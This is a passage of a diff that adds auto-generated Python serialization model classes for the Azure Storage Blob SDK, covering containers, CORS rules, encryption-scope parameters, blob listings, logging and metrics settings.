start: long + :keyword end: Required. + :paramtype end: long + """ + super(ClearRange, self).__init__(**kwargs) + self.start = kwargs['start'] + self.end = kwargs['end'] + + +class ContainerCpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the default + encryption scope to set on the container and use for all future writes. + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true, + prevents any request from specifying a different encryption scope than the scope set on the + container. + :vartype prevent_encryption_scope_override: bool + """ + + _attribute_map = { + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'PreventEncryptionScopeOverride', 'type': 'bool'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword default_encryption_scope: Optional. Version 2019-07-07 and later. Specifies the + default encryption scope to set on the container and use for all future writes. + :paramtype default_encryption_scope: str + :keyword prevent_encryption_scope_override: Optional. Version 2019-07-07 and newer. If true, + prevents any request from specifying a different encryption scope than the scope set on the + container. + :paramtype prevent_encryption_scope_override: bool + """ + super(ContainerCpkScopeInfo, self).__init__(**kwargs) + self.default_encryption_scope = kwargs.get('default_encryption_scope', None) + self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None) + + +class ContainerItem(msrest.serialization.Model): + """An Azure Storage container. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar deleted: + :vartype deleted: bool + :ivar version: + :vartype version: str + :ivar properties: Required. Properties of a container. + :vartype properties: ~azure.storage.blob.models.ContainerProperties + :ivar metadata: Dictionary of :code:``. + :vartype metadata: dict[str, str] + """ + + _validation = { + 'name': {'required': True}, + 'properties': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'deleted': {'key': 'Deleted', 'type': 'bool'}, + 'version': {'key': 'Version', 'type': 'str'}, + 'properties': {'key': 'Properties', 'type': 'ContainerProperties'}, + 'metadata': {'key': 'Metadata', 'type': '{str}'}, + } + _xml_map = { + 'name': 'Container' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword deleted: + :paramtype deleted: bool + :keyword version: + :paramtype version: str + :keyword properties: Required. Properties of a container. + :paramtype properties: ~azure.storage.blob.models.ContainerProperties + :keyword metadata: Dictionary of :code:``. + :paramtype metadata: dict[str, str] + """ + super(ContainerItem, self).__init__(**kwargs) + self.name = kwargs['name'] + self.deleted = kwargs.get('deleted', None) + self.version = kwargs.get('version', None) + self.properties = kwargs['properties'] + self.metadata = kwargs.get('metadata', None) + + +class ContainerProperties(msrest.serialization.Model): + """Properties of a container. + + All required parameters must be populated in order to send to Azure. + + :ivar last_modified: Required. + :vartype last_modified: ~datetime.datetime + :ivar etag: Required. + :vartype etag: str + :ivar lease_status: Possible values include: "locked", "unlocked". + :vartype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :ivar lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :vartype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :ivar lease_duration: Possible values include: "infinite", "fixed". + :vartype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :ivar public_access: Possible values include: "container", "blob". + :vartype public_access: str or ~azure.storage.blob.models.PublicAccessType + :ivar has_immutability_policy: + :vartype has_immutability_policy: bool + :ivar has_legal_hold: + :vartype has_legal_hold: bool + :ivar default_encryption_scope: + :vartype default_encryption_scope: str + :ivar prevent_encryption_scope_override: + :vartype prevent_encryption_scope_override: bool + :ivar deleted_time: + :vartype deleted_time: ~datetime.datetime + :ivar remaining_retention_days: + :vartype remaining_retention_days: int + :ivar is_immutable_storage_with_versioning_enabled: Indicates if version level worm is enabled + on this container. + :vartype is_immutable_storage_with_versioning_enabled: bool + """ + + _validation = { + 'last_modified': {'required': True}, + 'etag': {'required': True}, + } + + _attribute_map = { + 'last_modified': {'key': 'Last-Modified', 'type': 'rfc-1123'}, + 'etag': {'key': 'Etag', 'type': 'str'}, + 'lease_status': {'key': 'LeaseStatus', 'type': 'str'}, + 'lease_state': {'key': 'LeaseState', 'type': 'str'}, + 'lease_duration': {'key': 'LeaseDuration', 'type': 'str'}, + 'public_access': {'key': 'PublicAccess', 'type': 'str'}, + 'has_immutability_policy': {'key': 'HasImmutabilityPolicy', 'type': 'bool'}, + 'has_legal_hold': {'key': 'HasLegalHold', 'type': 'bool'}, + 'default_encryption_scope': {'key': 'DefaultEncryptionScope', 'type': 'str'}, + 'prevent_encryption_scope_override': {'key': 'DenyEncryptionScopeOverride', 'type': 'bool'}, + 'deleted_time': {'key': 'DeletedTime', 'type': 'rfc-1123'}, + 'remaining_retention_days': {'key': 'RemainingRetentionDays', 'type': 'int'}, + 'is_immutable_storage_with_versioning_enabled': {'key': 'ImmutableStorageWithVersioningEnabled', 'type': 'bool'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword last_modified: Required. + :paramtype last_modified: ~datetime.datetime + :keyword etag: Required. + :paramtype etag: str + :keyword lease_status: Possible values include: "locked", "unlocked". + :paramtype lease_status: str or ~azure.storage.blob.models.LeaseStatusType + :keyword lease_state: Possible values include: "available", "leased", "expired", "breaking", + "broken". + :paramtype lease_state: str or ~azure.storage.blob.models.LeaseStateType + :keyword lease_duration: Possible values include: "infinite", "fixed". + :paramtype lease_duration: str or ~azure.storage.blob.models.LeaseDurationType + :keyword public_access: Possible values include: "container", "blob". + :paramtype public_access: str or ~azure.storage.blob.models.PublicAccessType + :keyword has_immutability_policy: + :paramtype has_immutability_policy: bool + :keyword has_legal_hold: + :paramtype has_legal_hold: bool + :keyword default_encryption_scope: + :paramtype default_encryption_scope: str + :keyword prevent_encryption_scope_override: + :paramtype prevent_encryption_scope_override: bool + :keyword deleted_time: + :paramtype deleted_time: ~datetime.datetime + :keyword remaining_retention_days: + :paramtype remaining_retention_days: int + :keyword is_immutable_storage_with_versioning_enabled: Indicates if version level worm is + enabled on this container. + :paramtype is_immutable_storage_with_versioning_enabled: bool + """ + super(ContainerProperties, self).__init__(**kwargs) + self.last_modified = kwargs['last_modified'] + self.etag = kwargs['etag'] + self.lease_status = kwargs.get('lease_status', None) + self.lease_state = kwargs.get('lease_state', None) + self.lease_duration = kwargs.get('lease_duration', None) + self.public_access = kwargs.get('public_access', None) + self.has_immutability_policy = kwargs.get('has_immutability_policy', None) + self.has_legal_hold = kwargs.get('has_legal_hold', None) + self.default_encryption_scope = kwargs.get('default_encryption_scope', None) + self.prevent_encryption_scope_override = kwargs.get('prevent_encryption_scope_override', None) + self.deleted_time = kwargs.get('deleted_time', None) + self.remaining_retention_days = kwargs.get('remaining_retention_days', None) + self.is_immutable_storage_with_versioning_enabled = kwargs.get('is_immutable_storage_with_versioning_enabled', None) + + +class CorsRule(msrest.serialization.Model): + """CORS is an HTTP feature that enables a web application running under one domain to access resources in another domain. Web browsers implement a security restriction known as same-origin policy that prevents a web page from calling APIs in a different domain; CORS provides a secure way to allow one domain (the origin domain) to call APIs in another domain. + + All required parameters must be populated in order to send to Azure. + + :ivar allowed_origins: Required. The origin domains that are permitted to make a request + against the storage service via CORS. The origin domain is the domain from which the request + originates. Note that the origin must be an exact case-sensitive match with the origin that the + user age sends to the service. You can also use the wildcard character '*' to allow all origin + domains to make requests via CORS. + :vartype allowed_origins: str + :ivar allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may + use for a CORS request. (comma separated). + :vartype allowed_methods: str + :ivar allowed_headers: Required. the request headers that the origin domain may specify on the + CORS request. + :vartype allowed_headers: str + :ivar exposed_headers: Required. The response headers that may be sent in the response to the + CORS request and exposed by the browser to the request issuer. + :vartype exposed_headers: str + :ivar max_age_in_seconds: Required. The maximum amount time that a browser should cache the + preflight OPTIONS request. + :vartype max_age_in_seconds: int + """ + + _validation = { + 'allowed_origins': {'required': True}, + 'allowed_methods': {'required': True}, + 'allowed_headers': {'required': True}, + 'exposed_headers': {'required': True}, + 'max_age_in_seconds': {'required': True, 'minimum': 0}, + } + + _attribute_map = { + 'allowed_origins': {'key': 'AllowedOrigins', 'type': 'str'}, + 'allowed_methods': {'key': 'AllowedMethods', 'type': 'str'}, + 'allowed_headers': {'key': 'AllowedHeaders', 'type': 'str'}, + 'exposed_headers': {'key': 'ExposedHeaders', 'type': 'str'}, + 'max_age_in_seconds': {'key': 'MaxAgeInSeconds', 'type': 'int'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword allowed_origins: Required. The origin domains that are permitted to make a request + against the storage service via CORS. The origin domain is the domain from which the request + originates. Note that the origin must be an exact case-sensitive match with the origin that the + user age sends to the service. You can also use the wildcard character '*' to allow all origin + domains to make requests via CORS. + :paramtype allowed_origins: str + :keyword allowed_methods: Required. The methods (HTTP request verbs) that the origin domain may + use for a CORS request. (comma separated). + :paramtype allowed_methods: str + :keyword allowed_headers: Required. the request headers that the origin domain may specify on + the CORS request. + :paramtype allowed_headers: str + :keyword exposed_headers: Required. The response headers that may be sent in the response to + the CORS request and exposed by the browser to the request issuer. + :paramtype exposed_headers: str + :keyword max_age_in_seconds: Required. The maximum amount time that a browser should cache the + preflight OPTIONS request. + :paramtype max_age_in_seconds: int + """ + super(CorsRule, self).__init__(**kwargs) + self.allowed_origins = kwargs['allowed_origins'] + self.allowed_methods = kwargs['allowed_methods'] + self.allowed_headers = kwargs['allowed_headers'] + self.exposed_headers = kwargs['exposed_headers'] + self.max_age_in_seconds = kwargs['max_age_in_seconds'] + + +class CpkInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_key: Optional. Specifies the encryption key to use to encrypt the data + provided in the request. If not specified, encryption is performed with the root account + encryption key. For more information, see Encryption at Rest for Azure Storage Services. + :vartype encryption_key: str + :ivar encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be provided + if the x-ms-encryption-key header is provided. + :vartype encryption_key_sha256: str + :ivar encryption_algorithm: The algorithm used to produce the encryption key hash. Currently, + the only accepted value is "AES256". Must be provided if the x-ms-encryption-key header is + provided. Possible values include: "None", "AES256". + :vartype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + + _attribute_map = { + 'encryption_key': {'key': 'encryptionKey', 'type': 'str'}, + 'encryption_key_sha256': {'key': 'encryptionKeySha256', 'type': 'str'}, + 'encryption_algorithm': {'key': 'encryptionAlgorithm', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword encryption_key: Optional. Specifies the encryption key to use to encrypt the data + provided in the request. If not specified, encryption is performed with the root account + encryption key. For more information, see Encryption at Rest for Azure Storage Services. + :paramtype encryption_key: str + :keyword encryption_key_sha256: The SHA-256 hash of the provided encryption key. Must be + provided if the x-ms-encryption-key header is provided. + :paramtype encryption_key_sha256: str + :keyword encryption_algorithm: The algorithm used to produce the encryption key hash. + Currently, the only accepted value is "AES256". Must be provided if the x-ms-encryption-key + header is provided. Possible values include: "None", "AES256". + :paramtype encryption_algorithm: str or ~azure.storage.blob.models.EncryptionAlgorithmType + """ + super(CpkInfo, self).__init__(**kwargs) + self.encryption_key = kwargs.get('encryption_key', None) + self.encryption_key_sha256 = kwargs.get('encryption_key_sha256', None) + self.encryption_algorithm = kwargs.get('encryption_algorithm', None) + + +class CpkScopeInfo(msrest.serialization.Model): + """Parameter group. + + :ivar encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :vartype encryption_scope: str + """ + + _attribute_map = { + 'encryption_scope': {'key': 'encryptionScope', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword encryption_scope: Optional. Version 2019-07-07 and later. Specifies the name of the + encryption scope to use to encrypt the data provided in the request. If not specified, + encryption is performed with the default account encryption scope. For more information, see + Encryption at Rest for Azure Storage Services. + :paramtype encryption_scope: str + """ + super(CpkScopeInfo, self).__init__(**kwargs) + self.encryption_scope = kwargs.get('encryption_scope', None) + + +class DelimitedTextConfiguration(msrest.serialization.Model): + """Groups the settings used for interpreting the blob data if the blob is delimited text formatted. + + :ivar column_separator: The string used to separate columns. + :vartype column_separator: str + :ivar field_quote: The string used to quote a specific field. + :vartype field_quote: str + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + :ivar escape_char: The string used as an escape character. + :vartype escape_char: str + :ivar headers_present: Represents whether the data has headers. + :vartype headers_present: bool + """ + + _attribute_map = { + 'column_separator': {'key': 'ColumnSeparator', 'type': 'str', 'xml': {'name': 'ColumnSeparator'}}, + 'field_quote': {'key': 'FieldQuote', 'type': 'str', 'xml': {'name': 'FieldQuote'}}, + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + 'escape_char': {'key': 'EscapeChar', 'type': 'str', 'xml': {'name': 'EscapeChar'}}, + 'headers_present': {'key': 'HeadersPresent', 'type': 'bool', 'xml': {'name': 'HasHeaders'}}, + } + _xml_map = { + 'name': 'DelimitedTextConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword column_separator: The string used to separate columns. + :paramtype column_separator: str + :keyword field_quote: The string used to quote a specific field. + :paramtype field_quote: str + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + :keyword escape_char: The string used as an escape character. + :paramtype escape_char: str + :keyword headers_present: Represents whether the data has headers. + :paramtype headers_present: bool + """ + super(DelimitedTextConfiguration, self).__init__(**kwargs) + self.column_separator = kwargs.get('column_separator', None) + self.field_quote = kwargs.get('field_quote', None) + self.record_separator = kwargs.get('record_separator', None) + self.escape_char = kwargs.get('escape_char', None) + self.headers_present = kwargs.get('headers_present', None) + + +class FilterBlobItem(msrest.serialization.Model): + """Blob info from a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar name: Required. + :vartype name: str + :ivar container_name: Required. + :vartype container_name: str + :ivar tags: A set of tags. Blob tags. + :vartype tags: ~azure.storage.blob.models.BlobTags + """ + + _validation = { + 'name': {'required': True}, + 'container_name': {'required': True}, + } + + _attribute_map = { + 'name': {'key': 'Name', 'type': 'str'}, + 'container_name': {'key': 'ContainerName', 'type': 'str'}, + 'tags': {'key': 'Tags', 'type': 'BlobTags'}, + } + _xml_map = { + 'name': 'Blob' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword name: Required. + :paramtype name: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword tags: A set of tags. Blob tags. + :paramtype tags: ~azure.storage.blob.models.BlobTags + """ + super(FilterBlobItem, self).__init__(**kwargs) + self.name = kwargs['name'] + self.container_name = kwargs['container_name'] + self.tags = kwargs.get('tags', None) + + +class FilterBlobSegment(msrest.serialization.Model): + """The result of a Filter Blobs API call. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar where: Required. + :vartype where: str + :ivar blobs: Required. + :vartype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'where': {'required': True}, + 'blobs': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'where': {'key': 'Where', 'type': 'str'}, + 'blobs': {'key': 'Blobs', 'type': '[FilterBlobItem]', 'xml': {'name': 'Blobs', 'wrapped': True, 'itemsName': 'Blob'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword where: Required. + :paramtype where: str + :keyword blobs: Required. + :paramtype blobs: list[~azure.storage.blob.models.FilterBlobItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(FilterBlobSegment, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.where = kwargs['where'] + self.blobs = kwargs['blobs'] + self.next_marker = kwargs.get('next_marker', None) + + +class GeoReplication(msrest.serialization.Model): + """Geo-Replication information for the Secondary Storage Service. + + All required parameters must be populated in order to send to Azure. + + :ivar status: Required. The status of the secondary location. Possible values include: "live", + "bootstrap", "unavailable". + :vartype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :ivar last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :vartype last_sync_time: ~datetime.datetime + """ + + _validation = { + 'status': {'required': True}, + 'last_sync_time': {'required': True}, + } + + _attribute_map = { + 'status': {'key': 'Status', 'type': 'str'}, + 'last_sync_time': {'key': 'LastSyncTime', 'type': 'rfc-1123'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword status: Required. The status of the secondary location. Possible values include: + "live", "bootstrap", "unavailable". + :paramtype status: str or ~azure.storage.blob.models.GeoReplicationStatusType + :keyword last_sync_time: Required. A GMT date/time value, to the second. All primary writes + preceding this value are guaranteed to be available for read operations at the secondary. + Primary writes after this point in time may or may not be available for reads. + :paramtype last_sync_time: ~datetime.datetime + """ + super(GeoReplication, self).__init__(**kwargs) + self.status = kwargs['status'] + self.last_sync_time = kwargs['last_sync_time'] + + +class JsonTextConfiguration(msrest.serialization.Model): + """json text configuration. + + :ivar record_separator: The string used to separate records. + :vartype record_separator: str + """ + + _attribute_map = { + 'record_separator': {'key': 'RecordSeparator', 'type': 'str', 'xml': {'name': 'RecordSeparator'}}, + } + _xml_map = { + 'name': 'JsonTextConfiguration' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword record_separator: The string used to separate records. + :paramtype record_separator: str + """ + super(JsonTextConfiguration, self).__init__(**kwargs) + self.record_separator = kwargs.get('record_separator', None) + + +class KeyInfo(msrest.serialization.Model): + """Key information. + + All required parameters must be populated in order to send to Azure. + + :ivar start: Required. The date-time the key is active in ISO 8601 UTC time. + :vartype start: str + :ivar expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :vartype expiry: str + """ + + _validation = { + 'start': {'required': True}, + 'expiry': {'required': True}, + } + + _attribute_map = { + 'start': {'key': 'Start', 'type': 'str'}, + 'expiry': {'key': 'Expiry', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword start: Required. The date-time the key is active in ISO 8601 UTC time. + :paramtype start: str + :keyword expiry: Required. The date-time the key expires in ISO 8601 UTC time. + :paramtype expiry: str + """ + super(KeyInfo, self).__init__(**kwargs) + self.start = kwargs['start'] + self.expiry = kwargs['expiry'] + + +class LeaseAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar lease_id: If specified, the operation only succeeds if the resource's lease is active and + matches this ID. + :vartype lease_id: str + """ + + _attribute_map = { + 'lease_id': {'key': 'leaseId', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword lease_id: If specified, the operation only succeeds if the resource's lease is active + and matches this ID. + :paramtype lease_id: str + """ + super(LeaseAccessConditions, self).__init__(**kwargs) + self.lease_id = kwargs.get('lease_id', None) + + +class ListBlobsFlatSegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobFlatListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'segment': {'key': 'Segment', 'type': 'BlobFlatListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobFlatListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsFlatSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.container_name = kwargs['container_name'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.segment = kwargs['segment'] + self.next_marker = kwargs.get('next_marker', None) + + +class ListBlobsHierarchySegmentResponse(msrest.serialization.Model): + """An enumeration of blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar container_name: Required. + :vartype container_name: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar delimiter: + :vartype delimiter: str + :ivar segment: Required. + :vartype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_name': {'required': True}, + 'segment': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'container_name': {'key': 'ContainerName', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'delimiter': {'key': 'Delimiter', 'type': 'str'}, + 'segment': {'key': 'Segment', 'type': 'BlobHierarchyListSegment'}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword container_name: Required. + :paramtype container_name: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword delimiter: + :paramtype delimiter: str + :keyword segment: Required. + :paramtype segment: ~azure.storage.blob.models.BlobHierarchyListSegment + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListBlobsHierarchySegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.container_name = kwargs['container_name'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.delimiter = kwargs.get('delimiter', None) + self.segment = kwargs['segment'] + self.next_marker = kwargs.get('next_marker', None) + + +class ListContainersSegmentResponse(msrest.serialization.Model): + """An enumeration of containers. + + All required parameters must be populated in order to send to Azure. + + :ivar service_endpoint: Required. + :vartype service_endpoint: str + :ivar prefix: + :vartype prefix: str + :ivar marker: + :vartype marker: str + :ivar max_results: + :vartype max_results: int + :ivar container_items: Required. + :vartype container_items: list[~azure.storage.blob.models.ContainerItem] + :ivar next_marker: + :vartype next_marker: str + """ + + _validation = { + 'service_endpoint': {'required': True}, + 'container_items': {'required': True}, + } + + _attribute_map = { + 'service_endpoint': {'key': 'ServiceEndpoint', 'type': 'str', 'xml': {'attr': True}}, + 'prefix': {'key': 'Prefix', 'type': 'str'}, + 'marker': {'key': 'Marker', 'type': 'str'}, + 'max_results': {'key': 'MaxResults', 'type': 'int'}, + 'container_items': {'key': 'ContainerItems', 'type': '[ContainerItem]', 'xml': {'name': 'Containers', 'wrapped': True, 'itemsName': 'Container'}}, + 'next_marker': {'key': 'NextMarker', 'type': 'str'}, + } + _xml_map = { + 'name': 'EnumerationResults' + } + + def __init__( + self, + **kwargs + ): + """ + :keyword service_endpoint: Required. + :paramtype service_endpoint: str + :keyword prefix: + :paramtype prefix: str + :keyword marker: + :paramtype marker: str + :keyword max_results: + :paramtype max_results: int + :keyword container_items: Required. + :paramtype container_items: list[~azure.storage.blob.models.ContainerItem] + :keyword next_marker: + :paramtype next_marker: str + """ + super(ListContainersSegmentResponse, self).__init__(**kwargs) + self.service_endpoint = kwargs['service_endpoint'] + self.prefix = kwargs.get('prefix', None) + self.marker = kwargs.get('marker', None) + self.max_results = kwargs.get('max_results', None) + self.container_items = kwargs['container_items'] + self.next_marker = kwargs.get('next_marker', None) + + +class Logging(msrest.serialization.Model): + """Azure Analytics Logging settings. + + All required parameters must be populated in order to send to Azure. + + :ivar version: Required. The version of Storage Analytics to configure. + :vartype version: str + :ivar delete: Required. Indicates whether all delete requests should be logged. + :vartype delete: bool + :ivar read: Required. Indicates whether all read requests should be logged. + :vartype read: bool + :ivar write: Required. Indicates whether all write requests should be logged. + :vartype write: bool + :ivar retention_policy: Required. the retention policy which determines how long the associated + data should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'version': {'required': True}, + 'delete': {'required': True}, + 'read': {'required': True}, + 'write': {'required': True}, + 'retention_policy': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'delete': {'key': 'Delete', 'type': 'bool'}, + 'read': {'key': 'Read', 'type': 'bool'}, + 'write': {'key': 'Write', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword version: Required. The version of Storage Analytics to configure. + :paramtype version: str + :keyword delete: Required. Indicates whether all delete requests should be logged. + :paramtype delete: bool + :keyword read: Required. Indicates whether all read requests should be logged. + :paramtype read: bool + :keyword write: Required. Indicates whether all write requests should be logged. + :paramtype write: bool + :keyword retention_policy: Required. the retention policy which determines how long the + associated data should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Logging, self).__init__(**kwargs) + self.version = kwargs['version'] + self.delete = kwargs['delete'] + self.read = kwargs['read'] + self.write = kwargs['write'] + self.retention_policy = kwargs['retention_policy'] + + +class Metrics(msrest.serialization.Model): + """a summary of request statistics grouped by API in hour or minute aggregates for blobs. + + All required parameters must be populated in order to send to Azure. + + :ivar version: The version of Storage Analytics to configure. + :vartype version: str + :ivar enabled: Required. Indicates whether metrics are enabled for the Blob service. + :vartype enabled: bool + :ivar include_apis: Indicates whether metrics should generate summary statistics for called API + operations. + :vartype include_apis: bool + :ivar retention_policy: the retention policy which determines how long the associated data + should persist. + :vartype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + + _validation = { + 'enabled': {'required': True}, + } + + _attribute_map = { + 'version': {'key': 'Version', 'type': 'str'}, + 'enabled': {'key': 'Enabled', 'type': 'bool'}, + 'include_apis': {'key': 'IncludeAPIs', 'type': 'bool'}, + 'retention_policy': {'key': 'RetentionPolicy', 'type': 'RetentionPolicy'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword version: The version of Storage Analytics to configure. + :paramtype version: str + :keyword enabled: Required. Indicates whether metrics are enabled for the Blob service. + :paramtype enabled: bool + :keyword include_apis: Indicates whether metrics should generate summary statistics for called + API operations. + :paramtype include_apis: bool + :keyword retention_policy: the retention policy which determines how long the associated data + should persist. + :paramtype retention_policy: ~azure.storage.blob.models.RetentionPolicy + """ + super(Metrics, self).__init__(**kwargs) + self.version = kwargs.get('version', None) + self.enabled = kwargs['enabled'] + self.include_apis = kwargs.get('include_apis', None) + self.retention_policy = kwargs.get('retention_policy', None) + + +class ModifiedAccessConditions(msrest.serialization.Model): + """Parameter group. + + :ivar if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :vartype if_modified_since: ~datetime.datetime + :ivar if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :vartype if_unmodified_since: ~datetime.datetime + :ivar if_match: Specify an ETag value to operate only on blobs with a matching value. + :vartype if_match: str + :ivar if_none_match: Specify an ETag value to operate only on blobs without a matching value. + :vartype if_none_match: str + :ivar if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a matching + value. + :vartype if_tags: str + """ + + _attribute_map = { + 'if_modified_since': {'key': 'ifModifiedSince', 'type': 'rfc-1123'}, + 'if_unmodified_since': {'key': 'ifUnmodifiedSince', 'type': 'rfc-1123'}, + 'if_match': {'key': 'ifMatch', 'type': 'str'}, + 'if_none_match': {'key': 'ifNoneMatch', 'type': 'str'}, + 'if_tags': {'key': 'ifTags', 'type': 'str'}, + } + + def __init__( + self, + **kwargs + ): + """ + :keyword if_modified_since: Specify this header value to operate only on a blob if it has been + modified since the specified date/time. + :paramtype if_modified_since: ~datetime.datetime + :keyword if_unmodified_since: Specify this header value to operate only on a blob if it has not + been modified since the specified date/time. + :paramtype if_unmodified_since: ~datetime.datetime + :keyword if_match: Specify an ETag value to operate only on blobs with a matching value. + :paramtype if_match: str + :keyword if_none_match: Specify an ETag value to operate only on blobs without a matching + value. + :paramtype if_none_match: str + :keyword if_tags: Specify a SQL where clause on blob tags to operate only on blobs with a + matching value. + :paramtype if_tags: str + """ + super(ModifiedAccessConditions, self).__init__(**kwargs) + self.if_modified_since = kwargs.get('if_modified_since', None) + self.if_unmodified_since = kwargs.get('if_unmodified_since', None) + self.if_match = kwargs.get('if_match', None) + self.if_none_match = kwargs.get('if_none_match', None) + self.if_tags = kwargs.get('if_tags', None) + + +class PageList(msrest.serialization.Model): + """the list of pages. + + :ivar page_range: + :vartype page_range: list[~azure.storage.blob.models.PageRange] + :ivar clear_range: + :vartype clear_range: list[~azure.storage.blob.models.ClearRange] + :ivar next_marker: + :vartype next_marker: str + """ 